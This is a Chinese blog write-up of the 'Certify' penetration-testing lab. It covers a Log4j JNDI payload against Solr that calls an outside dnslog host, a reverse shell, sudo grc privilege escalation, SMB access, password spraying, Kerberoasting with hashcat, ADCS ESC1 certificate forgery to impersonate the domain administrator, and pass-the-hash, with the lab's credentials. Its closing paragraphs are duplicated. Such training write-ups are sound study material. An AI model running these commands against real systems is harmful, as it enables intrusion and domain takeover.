春秋云境 Certify WP

已于 2024-01-18 20:41:57 修改
阅读量1.1k 收藏 23
点赞数 21
文章标签: 学习 笔记 安全
于 2024-01-18 20:41:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62466350/article/details/135683737
版权

春秋云境 Certify WP

本文首发作者博客园 春秋云境 Certify WP - fdx_xdf - 博客园 (cnblogs.com)

Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。

  • Solr
  • AD CS
  • SMB
  • Kerberos
  • 域渗透

flag01

正常打开站点什么都没有,fscan扫一下

image-20231223133845131

这里发现solr,并且有log4j2

image-20231223133906894

dnslog验证一下

[39.99.132.181:8983/solr/admin/cores?action= j n d i : l d a p : / / i b h 708. d n s l o g . c n ] ( h t t p : / / 39.99.132.181 : 8983 / s o l r / a d m i n / c o r e s ? a c t i o n = {jndi:ldap://ibh708.dnslog.cn}](http://39.99.132.181:8983/solr/admin/cores?action= jndi:ldap://ibh708.dnslog.cn](http://39.99.132.181:8983/solr/admin/cores?action={jndi:ldap://ibh708.dnslog.cn})

image-20231223134040321

利用工具获取shell

image-20240118164428621

成功反弹

image-20231223134845756

这里找到了提权方式

sudo grc --pty /bin/sh
python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20231223140450743

获得flag01

image-20231223140607540

flag02

这里先看一下ip

image-20231223141326645

上传fscan扫描(这里其实还有一台CA01服务器,不知道为什么没扫出来)

172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.7:88 open
172.22.9.47:21 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.47:139 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.7:135 open
172.22.9.26:135 open
172.22.9.47:80 open
172.22.9.7:80 open
172.22.9.19:8983 open
[*] NetInfo 
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] WebTitle http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] WebTitle http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios 172.22.9.7      [+] DC:XIAORANG\XIAORANG-DC    
[*] NetInfo 
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.9.47     fileserver                          Windows 6.1
[*] OsInfo 172.22.9.47	(Windows 6.1)
[*] WebTitle http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle http://172.22.9.7         code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect

简单分析一下:

172.22.9.19
	已经拿下
172.22.9.47
	fileserver 
172.22.9.26
	域内 DESKTOP-CBKTVMO.xiaorang.lab
172.22.9.7
	DC  poc-yaml-active-directory-certsrv-detect

题目考点写了个SMB,估计是有SMB服务,那肯定是fileserver这台ubuntu上存在,用smbclient连了一下果然连上去了

image-20231223153127533

然后在secret目录获得flag

image-20231223153519933

flag03&flag04

这里拿到了个数据库,看了一下有个user表里有密码但没用户名,又有一个表有一堆用户名

image-20231223154955545

进行爆破

crackmapexec smb  172.22.9.26 -u user.txt -p password.txt

image-20231223160940138

xiaorang.lab\zhangjian:i9XDE02pLVf 但是rdp登录不上去

image-20231223161038987

kerberoasting攻击

这里想起来flag02的提示,spn,所以先查一下有没有域用户的spn

proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

image-20231223161706645

然后使用hashcat进行破解

hashcat64.exe -m 13100 1.txt rockyou.txt

image-20231223162336139

zhangxia MyPass2@@6

成功连进来了,但是看不到flag,进行adcs攻击

image-20231223162552970

ESC1

这里先查询漏洞,直接爆出来ESC1

proxychains certipy find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

Certificate Authorities
  0
    CA Name                             : xiaorang-XIAORANG-DC-CA
    DNS Name                            : XIAORANG-DC.xiaorang.lab
    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start          : 2023-07-14 04:33:21+00:00
    Certificate Validity End            : 2028-07-14 04:43:21+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : XR Manager
    Display Name                        : XR Manager
    Certificate Authorities             : xiaorang-XIAORANG-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner                           : XIAORANG.LAB\Administrator
        Write Owner Principals          : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Dacl Principals           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Property Principals       : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication

申请 XR Manager 证书模版并伪造域管理员,得到administrator.pfx,然后利用administrator.pfx证书获取 TGT 和 NTLM Hash

但是要注意,要改一下hosts,不然会超时,就像下图一样

proxychains certipy req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager'  -upn administrator@xiaorang.lab
proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7

image-20240118203003002

改之后是正常的

image-20240118203103222

这里拿到了域管的hash,剩下的两个机器直接pth就行了(这里少截了一张图)。

image-20231223170823140

auth -pfx administrator.pfx -dc-ip 172.22.9.7


[外链图片转存中...(img-gb8YlCib-1705581641403)]

改之后是正常的

[外链图片转存中...(img-OEKOjYHa-1705581641403)]

这里拿到了域管的hash,剩下的两个机器直接pth就行了(这里少截了一张图)。

[外链图片转存中...(img-AGSf2zwE-1705581641404)]
疯癫兄
关注
  • 21
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Active Directory 证书服务(一)
ZAWX_NETSTARSEC的博客
08-19 2436
Active Directory 证书服务(一) 0x00 前言 specterops发布了一篇关于Active Directory 证书服务相关漏洞的白皮书 https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf,关于Active Directory 证书服务的攻击第一次系统的进入我们的视野。 我在白皮书的基础上学习Active Directory 证书服务相关的漏洞,作为学习成果,用两篇文章来介绍Active Directo
2022网鼎杯半决赛复盘
龙狼刺的博客
07-12 1634
该靶场为2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4个flag,分布于不同的靶机。
xray Web扫描器学习记录
weixin_50464560的博客
06-06 3989
简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。 基本使用代理模式代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。 生成ca证书Bash# 生成 .
vulntarget-L(星期五实验室)
最新发布
ka_ka11的博客
03-20 1089
这个EXCHANGE$就是当前exchang机器的机器用户,而有这个用户的权限是用户组的WriteDACL权限,WriteDACL权限可以修改域对象的ACL,允许委托人修改受影响对象的DACL。我直接在exchange上添加一个网卡,直接进行反弹,后面再看看能不能通过goproxy代理,上线,模拟刚才我们获得system权限,我们进行提权。修改ip地址为自动,修改dns地址为114.114.114.114,修改完成应用,重新。修改tenda 端口转发的地址,修改为自己的出网的ip地址。
春秋云境Certify-WP【一遍过】
weixin_63576152的博客
10-12 337
这里有几个用户名被修改成*了 因为都是些个人的账号密码,再联系前面扫到的三个3389端口,尝试爆破172.22.9.26(域控和CA域不大可能,172.22.9.26这个域内机器是最有可能的)开代理,先看172.22.9.47 文件服务器,刚好也开了445端口(TCP端口),直接可以连接。扫描可以看到一个solr,solr一般会有log4j漏洞,看到有log4j组件。再次远程连接172.22.9.26,成功,但是没有管理员权限,所以没什么用处。导出数据,编为字典user.txt和pass.txt,爆破。
春秋云镜-【仿真场景】Certify writeup
渗透测试研究中心
03-07 1054
说明Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Solr、AD CS、SMB、Kerberos、域渗透第一个flaglog4j RCE扫描外网IP发现solr存在log4j的组件,测试...
靶场练习--春秋云境-Certify
NoooEmotion的博客
01-28 1639
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
春秋云境2022网鼎杯半决赛-WP【一遍过】
weixin_63576152的博客
10-17 435
注意,这里的certipy不是出现命令不存在kali让你下载的那个,这个是个打CVE-2022–26923的工具:https://github.com/ly4k/Certipy/打开http://172.22.15.24/phpmyadmin用账号和密码登了一下,发现有个表有一堆域账户。(脚本链接:https://github.com/AlmondOffSec/PassTheCert/)wordpress,打开http://39.99.137.31/wp-admin。原来是**校园网,后来换热点就可以了。
春秋云镜-2022网鼎杯半决赛复盘-Writeup
qq_35607078的博客
08-14 958
春秋云镜-2022网鼎杯半决赛复盘-Writeup
certify
03-22
如果证书未按预期更新 假设您使用postal启动了容器,并且您是docker组的成员,请通过运行以下命令输入容器 postal enter certbot 要快速检查证书的到期日期,请运行 certbot certificates 在容器内,“让我们加密”...
poco:Poco将使用简单的YAML配置文件帮助您组织和管理各种复杂程度的Docker,Docker-Compose,Kubernetes,Openshift项目,从而缩短从查找项目到在本地环境中初始化项目的路线
05-03
POCO Poco使用简单的YAML配置文件帮助组织和管理各种复杂性的Docker,Docker-Compose,Kubernetes项目,从而缩短了从查找项目到在本地环境中初始化项目的路线。 很简单。 使用非常简单的命令行界面配置,运行和在项目之间切换。 灵活性强。 轻松管理,扩展和维护任何复杂性的项目。 配置一次,到处使用。 一次配置项目,以便团队其他成员将感受到零配置的价值。 特征 开箱即用的Docker,Docker-Compose,Kubernetes,Helm支持。 Git,SVN支持开箱即用。 项目目录,多个目录。 创建您自己的项目目录。 无需其他工具即可组织您的项目。 多个计划。 为不同的环境甚至是出于演示目的的环境创建多个计划。 轻松地在计划(环境)之间切换。 简单的配置文件。 Poco有助于拆分配置文件,因此可以随时轻松维护和扩展它们。 脚本支持(挂钩
certify-aws-issuer:验证更新的AWS发行者
03-28
验证AWS更新的Issuer 旨在与github.com/aws/aws-sdk-go-v2最新版本一起使用,而github.com/aws/aws-sdk-go-v2中的aws实现不支持该github.com/johanbrandhorst/certify 。如何使用它与默认库相同:)
应用手册How to Certify Your Bluetooth Product-综合文档
05-22
应用手册How to Certify Your Bluetooth Product
SYNPLICITY的CERTIFY软件全面支持XILINX VIRTEX-5 FPGA
12-02
Synplicity公司日前宣布其Certify ASIC RTL原型设计软件增强了对Xilinx Virtex-5系列的65纳米FPGA的支持。Certify软件是业界首款支持多个FPGA进行ASIC原型设计的产品。Certify工具将多芯片分组技术与业界一流的FPGA...
应用手册How to Certify Your Bluetooth Product.pdf-综合文档
05-24
应用手册How to Certify Your Bluetooth Product.pdf
安装 Active Directory 证书服务的时候没有Certsrv
weixin_30537391的博客
09-17 1076
在Windows Server 的时候一直没有Certsrv这个目录。 需要检查一下在IIS中网站的ID顺序。 默认使用ID为1的。 转载于:https://www.cnblogs.com/qiumc/p/11533643.html
我的漏洞扫描及安全应急之道
wulanlin的博客
12-29 1793
编写POC 以xray为例 插件编写 官方公布最基础的POC如下 name: poc-yaml-example-com # 脚本部分 transport: http rules: r1: request: method: GET path: "/" expression: | response.status==200 && response.body.bcontain
活动目录(Active Directory安全审计
ITmoster的博客
04-26 668
ADAudit Plus 可以清楚地显示 AD 资源所做的所有更改,包括 AD 对象、属性、组策略等。AD 审计有助于检测和响应内部威胁、特权滥用和其他妥协指标,简而言之,可以增强组织的安全性。
certify-swiper7.zip
09-17
Certify-swiper7.zip是一个可能是一个压缩文件的命名。根据名称中的"certify",可以推测这个文件可能与认证有关。同时,"swiper7"这个词可能与一些滑块(slider)的功能或版本有关。 根据文件的后缀为.zip,可以推断出这是一个压缩文件。压缩文件经常用于打包和压缩多个文件或文件夹,以减少文件的大小,并将其用于传输或存储目的。在这种情况下,certify-swiper7.zip可能包含一些认证相关的文件或文件夹。 为了详细了解certify-swiper7.zip的内容,需要解压缩这个文件。可以使用解压缩软件(如WinRAR、7-Zip等)来打开并解压这个文件。解压缩后,我们可以查看文件和文件夹的结构,以了解其内容。 解压缩后,我们可以进一步查看certify-swiper7.zip的内容。如果这个压缩文件确实与认证有关,其中可能包含认证证书、授权文件、代码库或认证相关的文档。这些文件可以帮助用户了解如何认证某个产品、服务或系统。 综上所述,certify-swiper7.zip可能是一个包含认证相关文件的压缩文件。为了详细了解其内容,需要解压缩这个文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值